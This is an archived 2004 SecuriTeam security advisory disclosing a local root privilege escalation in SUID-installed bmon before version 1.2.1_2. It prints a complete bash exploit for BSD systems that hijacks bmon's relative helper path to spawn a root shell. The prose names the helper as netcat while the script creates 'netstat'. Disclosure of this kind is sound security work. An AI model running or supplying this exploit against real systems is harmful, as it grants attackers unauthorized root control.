[UNIX] BMon Relative Path Privilege Escalation

From: SecuriTeam (support_at_securiteam.com)
Date: 10/17/04

  • Next message: SecuriTeam: "[NT] Poisoning Cached HTTPS Documents in Internet Explorer"
    To: list@securiteam.com
    Date: 17 Oct 2004 15:55:15 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      BMon Relative Path Privilege Escalation
    ------------------------------------------------------------------------

    SUMMARY

    " <http://trash.net/~reeler/bmon/> Bmon is an interface bandwidth monitor
    using the curses library. It's able to compute and draw three types of
    diagrams (overview, graphical, and detailed). The overview diagram is a
    list of all interfaces including the rx/tx rates of each interface. The
    graphical diagram is a bar graph in ASCII. All diagrams are continously
    updated."
    When Bmon is installed SUID, a malicious attacker can override default
    system path and execute arbitrary commands under root privileges.

    DETAILS

    Vulnerable Systems:
     * Bmon version lower than 1.2.1_2

    When bmon is executed with the -n parameter it popen()s netcat but fails
    to provide an absolute path. some bsds are configured with acls that don't
    allow setuid files to run except those that are explicitly allowed, so
    creating a file called netcat that chmod's +s bash wouldn't work, bash
    needs to run directly by bmon which uses ncurses, so to get a useable
    shell we need to redirect stdout to stderr (stdout is closed), and restore
    the stty settings.

    Exploit Code:
    Presented below is a local exploit code for *BSD systems.

    #!/usr/local/bin/bash

    # Written by Idan Nahoum. idanna@bk.ru
    # local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
    # when bmon is executed with the -n parameter it popen()s netcat
    # but fail to provide an absoluth path.
    # some bsds are configured with acls that doesnt allow setuid files to
    # run except those that are explicity allowed, so creating a file called
    # netcat that chmod's +s bash wouldnt work, bash needs to run directly by
    # bmon which uses ncurses, so to get a useable shell we need to redirect
    # stdout to stderr (stdout is closed), and restore the stty settings.
    # http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html

    declare -r SPATH="${PATH}"
    declare -r STTY_EXEC=$(which stty)
    declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)
    declare -r QSHELL="/usr/local/bin/bash"
    declare BMON_EXEC="/usr/local/sbin/bmon"

    echo "$0 [default: ${BMON_EXEC}]"

    [ "$#" -gt "0" ] && BMON_EXEC="${1}"

    [ -x "${BMON_EXEC}" ] ||
    {
    echo "${BMON_EXEC} not found"
    exit
    }

    cd /tmp

    # apparently bmon closes stdout, so we run a shell with stdout redirected
    # to stderr.

    cat > ./netstat <<EOF
    ${STTY_EXEC} ${STTY_SETTINGS}
    PATH=${SPATH} /bin/sh 1>&2
    EOF

    /bin/chmod 755 ./netstat
    echo "trying to exploit"
    PATH=./ "${BMON_EXEC}" -n

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:idanna@bk.ru> Idan Nahoum.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Poisoning Cached HTTPS Documents in Internet Explorer"

    Relevant Pages

    • [NT] PacketTrap TFTP Server Denial of Service
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in the way pt360's TFTP ... int timeout; ... if local_file is equal to %s will be used stdout for upload or ...
      (Securiteam)
    • [NT] Argon Client Management Services Directory Traversal
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... int timeout; ... u_short port = PORT; ... if local_file is equal to %s will be used stdout for ...
      (Securiteam)
    • [NT] 2X ThinClientServer Directory Traversal
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... int timeout; ... u_short port = PORT; ... if local_file is equal to %s will be used stdout for ...
      (Securiteam)
    • [NT] LANDesk Management Suite Directory Traversal
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... int timeout; ... u_short port = PORT; ... if local_file is equal to %s will be used stdout for ...
      (Securiteam)
    • [NT] BootManage TFTPD Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... is "a TFTP server for Windows implemented in BootManage Administrator". ... int timeout; ... if local_file is equal to %s will be used stdout for ...
      (Securiteam)